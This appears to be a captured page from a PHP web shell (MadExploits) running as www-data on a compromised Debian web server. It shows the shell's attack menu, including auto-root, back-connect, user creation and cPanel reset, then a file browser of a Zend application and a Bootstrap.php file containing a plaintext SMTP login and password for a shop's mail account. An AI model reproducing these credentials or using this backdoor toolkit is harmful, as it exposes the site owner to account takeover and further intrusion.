Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.191.171.86
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
leksykografia /
application /
[ HOME SHELL ]
Name
Size
Permission
Action
configs
[ DIR ]
drwxr-xr-x
controllers
[ DIR ]
drwxr-xr-x
forms
[ DIR ]
drwxr-xr-x
layouts
[ DIR ]
drwxr-xr-x
models
[ DIR ]
drwxr-xr-x
views
[ DIR ]
drwxr-xr-x
.DS_Store
6
KB
-rw-r--r--
Bootstrap.php
1.4
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Bootstrap.php
<?php class Bootstrap extends Zend_Application_Bootstrap_Bootstrap { protected function _initDoctype() { $this->bootstrap('view'); $view = $this->getResource('view'); $view->doctype('XHTML1_STRICT'); } protected function _initLocale() { $locale = new Zend_Locale(); $locale->setDefault("pl"); $locale->setLocale("pl"); setlocale(LC_ALL, 'pl_PL.UTF-8','pl_PL', 'pl', 'Polish_Poland.28592'); Zend_Registry::set('Zend_Locale', $locale); } protected function _initRouter() { $frontController = Zend_Controller_Front::getInstance(); $router = $frontController->getRouter(); $config = new Zend_Config_Ini(APPLICATION_PATH . '/configs/routes.ini', 'production'); $router = new Zend_Controller_Router_Rewrite(); $router->addConfig($config, 'routes'); $frontController->setRouter($router); } protected function _initSession() { if( ! Zend_Session::isStarted() ) { Zend_Session::start(); } } protected function _initMail() { $tr = new Zend_Mail_Transport_Smtp('imagofilm.home.pl', array( 'auth' => 'login', 'username' => 'sklep@imagofilm.pl', 'password' => 'polisa12', 'ssl' => 'ssl', 'port' => 465) ); Zend_Mail::setDefaultTransport( new Zend_Mail_Transport_Sendmail()); } }
Close